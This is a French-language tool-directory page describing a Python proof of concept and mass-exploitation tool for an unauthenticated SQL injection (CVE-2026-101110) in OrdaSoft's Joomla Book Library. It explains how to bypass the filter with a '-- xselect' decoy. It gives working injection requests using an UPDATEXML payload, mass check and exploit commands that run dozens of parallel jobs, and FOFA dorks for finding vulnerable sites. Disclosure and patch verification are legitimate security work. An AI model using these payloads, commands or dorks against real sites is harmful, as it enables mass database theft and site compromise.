Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-101110 — PoC Python 3 et exploit de masse pour CVE-2026-101110, une injection SQL ORDER BY non authentifiée dans OrdaSoft Joomla Book Library <=6.4.6 via les paramètres field/direction. | Kitploit
Outils/GitHubGitHub/murrez/cve-2026-101110
ReconnaissanceScanners de VulnérabilitésAnalyse des VulnérabilitésExploitationScripting et AutomatisationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubmurrez/cve-2026-101110

CVE-2026-101110

il y a 4 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

PoC Python 3 et exploit de masse pour CVE-2026-101110, une injection SQL ORDER BY non authentifiée dans OrdaSoft Joomla Book Library <=6.4.6 via les paramètres field/direction.

Voir le dépôt
Partager

CVE-2026-101110 — OrdaSoft Book Library (Free) injection SQL non authentifiée

PoC Python 3 pour CVE-2026-101110 — OrdaSoft Book Library (Free) pour Joomla ≤ 6.4.6. Mettre à jour vers 6.4.7+.

PoCbithttps://pocbit.org/pocs/cve-2026-101110
Cataloguehttps://pocbit.org/pocs/
Composantcom_booklibrary
Fichier / fonctionsite/booklibrary.php → books()
Paramètresfield, direction (tri)
AuthentificationAucune (listes de livres publiques)
CWECWE-89 Injection SQL
CVSS 4.09.3 Critique (Joomla CNA)
CréditAla Arfaoui

Résumé de la vulnérabilité (Türkçe)

Book Library (Free) est une extension OrdaSoft qui fournit des listes de bibliothèques de livres / catégories dans Joomla. Dans les versions 6.4.6 et antérieures, la fonction books() filtre les paramètres field et direction avec protectInjectionWithoutQuote(). Cette fonction applique une liste noire faible qui recherche uniquement la sous-chaîne select ; lorsqu'elle la trouve, elle entoure la valeur avec $db->quote() au lieu de la rejeter.

Les valeurs sont ensuite ajoutées à une expression ORDER BY sans guillemets — l'utilisation de guillemets ici n'arrête pas l'injection SQL (description CNA).

Deux conditions sont nécessaires pour l'exploitation :

  1. Amorçage de session : La première requête écrit les valeurs de tri par défaut (field / direction) stockées dans la session.
  2. Contournement de la liste noire : Dans la seconde requête, un commentaire leurre -- xselect est ajouté à la fin de la charge utile ; il passe le contrôle de la liste noire, et le commentaire SQL neutralise le reste de la charge utile.

Résultat : SQLi dans ORDER BY sans authentification, risque critique pour la lecture/écriture de la base de données et l'intégrité du site.


Mécanisme technique

Request 1 (prime):  ...&field=title&direction=ASC   → session sort defaults
Request 2 (inject): ...&field=<expr> -- xselect&direction=ASC
                      └─ concatenated into ORDER BY (unquoted)

Filtre faible (conceptuel) :

  • L'entrée contient select (sous-chaîne) → entoure toute la valeur de guillemets (sans effet dans un contexte ORDER BY).
  • L'attaquant ajoute -- xselect afin que la liste noire voie select dans la queue de commentaire tandis que l'expression active avant -- reste du SQL exécutable (techniques error-based / UPDATEXML / ORDER BY empilé).

Le PoC implémente :

ÉtapeAction
EmpreinteChemins com_booklibrary + version du manifeste en option
Découverte de routeshowCategory, search, showBooks, books, … + catid / Itemid extraits
checkAmorçage de session → confirmation de la SQLi (flag / VERSION())
exploitAmorçage → extraction --subquery (par défaut SELECT VERSION())
mass--list + cibles parallèles -j ; exploited.txt en cas de fuite réussie

Suffixe de charge utile constant dans le code : -- xselect (BLACKLIST_DECOY).


Prérequis

cd CVE-2026-101110
pip install -r requirements.txt

Utilisation

Cible unique

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"

Traitement en masse (workflow exploit-first)

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 12 --subquery "SELECT VERSION()" --exploited-list exploited.txt
OptionSignification
--aggressiveLe mode check tente une fuite de version après l'amorçage
--subqueryExpression interne pour les charges utiles UPDATEXML / double-query
--exploited-listExtractions réussies séparées par des tabulations
--no-colorDésactive ANSI (également NO_COLOR)

JSONL : pocbit, pocbit_catalog, pocbit_page, cve, component, session_primed.


Exemple HTTP

Amorçage (session) :

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=title&direction=ASC HTTP/1.1

Injection (le PoC ajoute le leurre) :

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=UPDATEXML(1,CONCAT(0x7e,(VERSION()),0x7e),1) -- xselect&direction=ASC HTTP/1.1

Les variantes POST sont tentées sur la même route lorsque GET échoue.


Détection de version

Manifeste (s'il est exposé) :

  • /administrator/components/com_booklibrary/booklibrary.xml

≤ 6.4.6 → ligne vulnérable ; ≥ 6.4.7 → corrigée (patched_version dans la sortie de check).


Dorks FOFA

body="option=com_booklibrary"
body="/components/com_booklibrary/" && body="Joomla"
body="com_booklibrary" && (body="booklibrary" || body="Book Library")
body="ordasoft" && body="booklibrary"

CVE OrdaSoft associées (sept. 2026)

CVEExtensionProblèmeCorrigé
CVE-2026-101110Book LibrarySQLi ORDER BY + contournement de liste noire6.4.7
CVE-2026-101111Book LibraryXSS réfléchi (paramètre title)6.4.7
CVE-2026-101108Vehicle ManagerSQLi ORDER BY6.5.8
CVE-2026-100752Real Estate ManagerSQLi ORDER BY6.7.9

Corrigez tous les composants OrdaSoft que vous déployez.


Références

  • PoCbit CVE-2026-101110
  • CVE.report CVE-2026-101110
  • OrdaSoft
  • Historique : ancienne SQLi com_booklibrary dans les tâches search/lend (CVE-2010-1522) — chemins de code différents

Mentions légales

Tests autorisés et validation de correctifs uniquement.


Description du dépôt GitHub

CVE-2026-101110 PoC: OrdaSoft Joomla Book Library (Free) <=6.4.6 unauth SQLi — field/direction ORDER BY, session prime + `-- xselect` blacklist bypass (com_booklibrary). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101110
Télécharger l’outil